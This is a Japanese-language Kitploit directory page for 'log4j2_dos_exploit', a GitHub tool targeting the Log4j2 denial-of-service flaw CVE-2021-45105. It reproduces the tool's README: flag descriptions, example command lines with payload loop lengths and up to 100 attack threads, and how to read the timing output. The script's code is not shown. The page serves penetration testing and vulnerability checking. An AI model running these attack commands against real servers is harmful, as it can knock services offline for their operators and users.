Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4j2_dos_exploit — log4j2 dos エクスプロイト,CVE-2021-45105 エクスプロイト,サービス拒否 poc | Kitploit
ツール/GitHubGitHub/iamsoscared/log4j2_dos_exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubiamsoscared/log4j2_dos_exploit

log4j2_dos_exploit

log4j2 dos エクスプロイト,CVE-2021-45105 エクスプロイト,サービス拒否 poc

リポジトリを見る
34年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

説明 about

author: 我超怕的

blog: https://www.cnblogs.com/iAmSoScArEd/

github: https://github.com/iAmSOScArEd/

date: 2021-12-20

log4j2 dos exploit

log4j2 dos 脆弱性悪用スクリプト

CVE-2021-45105 Exploit

CVE-2021-45105 悪用スクリプト

使用方法 how to use

英語:

root@kitploit:~
Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>

-u,--url    	  attack target
-m,--method    http method, only get and post. default is get.
-d,--data   	  get or post params, json format like:{\"username\":\"\"}
-H,--header    request header, json format like:{\"user-agent\":\"\"}
-l,--loop    	 payload loop times (or length),default 100.it is determine where is the params, example get param max length or post param max length or request header max length
-t,--thread    attack thread. default is 0, just request once.

usage:
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"}
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -l 500
Log4j2_dos.py -u http://url.com/ -m post -H {\"user-agent\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -H {\"user-agent\":\"\"} -l 500

-l (--loop) 値は状況に応じて別々に設定する必要があり、大きければ良いというものではありません。Webサーバが受け入れ可能な長さを超えると、攻撃検出に失敗し、攻撃効果が得られない可能性があります。

出力形式:

[+] normal time:0.11111

[+] attack time:2.00000

attack time - normal time > 1 などの場合、脆弱性が存在する可能性があります。-t パラメータを使用して攻撃スレッドを設定できます。

日本語:

root@kitploit:~
 Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>
 
-u,--url   		 攻撃目標
-m,--method    デフォルトはget、httpメソッド、getとpostのみサポート
-d,--data   	 getまたはpostリクエストパラメータ、json形式、例:{\"username\":\"\"}
-H,--header    リクエストヘッダー, json形式, 例:{\"user-agent\":\"\"}
-l,--loop     	 デフォルトは100、ペイロードループ長、パラメータの位置に応じて異なる値を設定。例:リクエストヘッダーの最大許容長、getの最大長、postの最大長
-t,--thread    デフォルトは0、1回のみリクエスト。攻撃スレッド。

一般的な使用法:
# デフォルトget、100ペイロードループ、攻撃検出1回、usernameパラメータに攻撃ペイロードを追加
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"}
# デフォルトget、500ペイロードループ設定、100攻撃スレッド起動、usernameパラメータに攻撃ペイロードを追加
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"} -l 500 -t 100
# POST指定、500ペイロードループ設定、攻撃検出1回、usernameパラメータに攻撃ペイロードを追加
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -l 500
# POST指定、500ペイロードループ設定、100攻撃スレッド起動、user-agentリクエストヘッダーに攻撃ペイロードを追加
Log4j2_dos.py -u http://url.com/ -m post -H {\"user-agent\":\"\"} -l 500 -t 100
# POST指定、500ペイロードループ設定、攻撃検出1回、usernameパラメータとuser-agentリクエストヘッダーに攻撃ペイロードを追加
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -H {\"user-agent\":\"\"} -l 500

-l(--loop) 値は状況に応じて別々に設定する必要があり、大きければ良いというものではありません。Webサーバが受け入れ可能な長さを超えると、攻撃検出に失敗し、攻撃効果が得られない可能性があります。

出力形式:

[+] normal time:0.11111

[+] attack time:2.00000

attack timeの遅延が大きい場合、脆弱性が存在することを示します。-t パラメータを使用して攻撃スレッドを設定できます。

免責事項

不正な目的で使用しないでください。学習と参考のみを目的としています。 いかなる違法行為も私とは無関係です。

(下手な英語です。翻訳は使っていません。大目に見てください。)

By:我超怕的

ツールをダウンロード